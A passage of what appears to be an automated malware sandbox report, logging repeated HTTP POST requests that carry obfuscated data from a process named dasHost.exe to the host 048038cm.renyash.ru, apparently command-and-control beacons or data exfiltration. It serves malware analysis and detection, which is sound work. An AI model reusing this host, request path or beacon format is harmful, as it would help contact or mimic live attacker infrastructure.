                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408c658184310-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=30245&min_rtt=26584&rtt_var=17291&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=26130&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449737104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:35.438139915 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:35.798444986 CET2584OUTData Raw: 56 56 5c 51 53 45 50 5a 5d 5f 52 56 5a 5b 58 5f 57 59 5f 58 54 54 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VV\QSEPZ]_RVZ[X_WY_XTTUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X?-5;74,Y;#4>*Y== 7+),$,)(50(<%\ ![(+
                                                                        Dec 28, 2024 20:42:36.512321949 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:36.755856037 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5zusnOVgYl04JXKErSGTzl6338HDp6zpQY%2FXROTv8GLgOd3Mw7TEFPFbrRtgWDKRn9PCbvZcx%2BFY%2F%2Fz8TWsWo00uYFI5Hr5DP2NwvR1rA2ieuq1w%2F9HAzFsN6Hwvt9PAPN0u0aqz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408d54e81c42c-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4505&min_rtt=1472&rtt_var=6619&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=56721&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449739104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:37.218085051 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:37.563827038 CET2584OUTData Raw: 56 5a 5c 53 56 45 50 5c 5d 5f 52 56 5a 51 58 5a 57 5b 5f 5f 54 51 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZ\SVEP\]_RVZQXZW[__TQUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X(<&";#S788,7)-'V#7U=(.9$"V?]>%\ ![(
                                                                        Dec 28, 2024 20:42:38.347980976 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:38.647552013 CET811INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F8jqR9StW%2B%2B32qomjJzKUM70q4aeN8xmIQUzKBc%2FnLGVYqnUahh11F4nWmPi3OXJDdhXEWU%2FaCXm2p8lvnBLWqunYc%2FHrgUH24f4Pa4ACneiOivJU%2BrPvAGG9F2rr9Tk7hshsaFC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408e0ae0a424d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2957&min_rtt=1700&rtt_var=3152&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=124160&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449743104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:45.062094927 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:45.407532930 CET2584OUTData Raw: 56 5a 59 55 53 44 50 5c 5d 5f 52 56 5a 5b 58 5e 57 5e 5f 51 54 5c 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZYUSDP\]_RVZ[X^W^_QT\UDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+=5,Z"5 /+$7]*.$#_#)?-?6 ?*%\ ![(+
                                                                        Dec 28, 2024 20:42:46.242917061 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:46.497098923 CET807INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MnPkfE%2BpilowflNRPCShMMKjywWXJxnQ7f2VhdKGULchZnmQclfSCRXbpMZSJuYQBOK7E%2FlbQJgbSQ1OaJMQ06aIkLmzS2tfZiTwMlBSm%2BSq7rJ7OI2B0vgy5naf9yfk75Ca9%2BqK"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94091208804391-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8341&min_rtt=1743&rtt_var=13849&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=26775&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449744104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:46.899283886 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:47.254412889 CET2584OUTData Raw: 56 55 59 55 56 47 55 5f 5d 5f 52 56 5a 50 58 55 57 58 5f 5c 54 5d 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYUVGU_]_RVZPXUWX_\T]UBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y?-^58_#5X-8/X7>=Q ,(?,:3["V'[=%\ ![(
                                                                        Dec 28, 2024 20:42:48.030553102 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:48.271955967 CET806INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHBo7TUv9P%2BEjGzivehmc8vHE%2FC4QoJ4kj7h6kg7%2FhDM%2Fwji2bcJkWyyeswolZiZxgS0uYGyIQyau1xgepRqOia9bv0m0EZZmdiWp3IBlCQc8Q6YgcMPlycA9TKodTQ7AVfR60zL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94091d3c5f0ca4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4341&min_rtt=1564&rtt_var=6142&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=61380&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449745104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:48.870582104 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:49.236679077 CET2584OUTData Raw: 53 57 59 56 53 42 50 5c 5d 5f 52 56 5a 5e 58 5a 57 5c 5f 5f 54 51 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SWYVSBP\]_RVZ^XZW\__TQUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X(,.5 ^##,/[#-)=3 *()?,986 ;\*%\ ![(?
                                                                        Dec 28, 2024 20:42:50.096729040 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:50.243901968 CET809INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:50 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8OgZVsHLjpez2CwMfat7t8oygmoorIA6bOWJ9Hvu%2BOa%2F995sXyVYF0WRmtIgXNyRjkcvqB8Ra%2BCW4i104AMp7nJe6YUzT%2F1s9Sf85ymA%2BkEa0f69f1Gu1JB4Jo0UdlCNz1IbYrjG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409299c0cc360-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8017&min_rtt=1706&rtt_var=13261&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=27972&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449746104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:51.176445961 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:51.532787085 CET2584OUTData Raw: 56 50 59 50 53 42 50 5b 5d 5f 52 56 5a 5a 58 5c 57 58 5f 5c 54 50 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYPSBP[]_RVZZX\WX_\TPUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'(,9!^7&+8(74>>/P#*+><:#3'\),%\ ![(/
                                                                        Dec 28, 2024 20:42:52.354885101 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:52.642426014 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aK3bTZqPlKlK2sEQIGZcJ%2Fvxt%2FNtm85U46hcpsNm6vB2H0ui5zaFP1nhKLT%2B8VGhzOWiZFLq1k1OSO7XWIVd2rmga01Wnz38Aov1hLt%2FfNhK%2FyCgjWcvqRdikSOjH9yloowe9MTP"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409383cb872aa-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4397&min_rtt=2003&rtt_var=5539&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=69011&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449748104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:53.772964001 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:54.169359922 CET2584OUTData Raw: 56 5b 5c 53 53 43 50 59 5d 5f 52 56 5a 59 58 5d 57 5f 5f 5b 54 54 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[\SSCPY]_RVZYX]W__[TTUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$<%\6, ';3#&*- 'U>?(::7[5_*<%\ ![(#
                                                                        Dec 28, 2024 20:42:54.949637890 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:55.205137014 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65b5yeWlJy9KgMfCDh2t7viV4tGhYK5d5sh27GKFgCN3KGCbBfSw4QQX1TxA8FnFHYrk1d9%2FKqGwvPFNfTu45Y6WLoX15UVbGHUn5FPEtIgZBS36cdpxTzJhJ0S0%2BpF2Hx%2BLYL9r"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409486af15e68-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3965&min_rtt=1676&rtt_var=5207&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=73029&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.449749104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:55.567270041 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:56.292149067 CET2584OUTData Raw: 53 57 5c 51 56 41 55 5c 5d 5f 52 56 5a 5a 58 5c 57 51 5f 59 54 5d 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SW\QVAU\]_RVZZX\WQ_YT]U@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[+< +7#8 2^>.;T :(*;_9*7[" 3_(,%\ ![(/
                                                                        Dec 28, 2024 20:42:56.698996067 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:56.944691896 CET810INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLFy7hnQ3r7h5ZswfGR4W%2F1DsYmBeT5N2bLpbkoFwPcMykTotfJ7Aau0%2BHhcx3ONTU5Gf1wd2fukFCuohWQxQh9S%2BKJhT36ePh%2F%2Fchx2TddZ3camzEHqNiq6o1n%2BtucVC2uPlJUL"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409535f2e8c47-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6211&min_rtt=1899&rtt_var=9336&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=40115&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.449751104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:58.121887922 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:58.469822884 CET2584OUTData Raw: 53 50 59 55 56 45 50 5d 5d 5f 52 56 5a 5a 58 55 57 5a 5f 5b 54 55 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SPYUVEP]]_RVZZXUWZ_[TUUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_</%5(<Y 6$^;;4)=<#:0*?+,:$#33_)%\ ![(/
                                                                        Dec 28, 2024 20:42:59.420763969 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:59.557224989 CET815INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6T%2FpRt0sV4u4mesNlU9jrCQ2m7j%2F9B0%2BQpQ4k5wJtxeWv6GuxBIOT8TE7Ho1vIcWG9cWOSWS5%2BdWidVniywdV7oHz8dY%2BjVhNcqFZ8pJ%2FzvJ9LEmbo1YnXlZ%2Byxb%2BBTBJB2zAVsB"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940963aeff435d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3646&min_rtt=2275&rtt_var=3595&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=110246&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.449752104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:42:59.862252951 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:00.219811916 CET2584OUTData Raw: 56 57 59 52 56 49 50 5f 5d 5f 52 56 5a 5f 58 55 57 5a 5f 59 54 5c 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VWYRVIP_]_RVZ_XUWZ_YT\UCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X<Z"] "6 Y/;7 .=>.,##*Y#Y,)<5V$(<%\ ![(
                                                                        Dec 28, 2024 20:43:01.006167889 CET25INHTTP/1.1 100 Continue
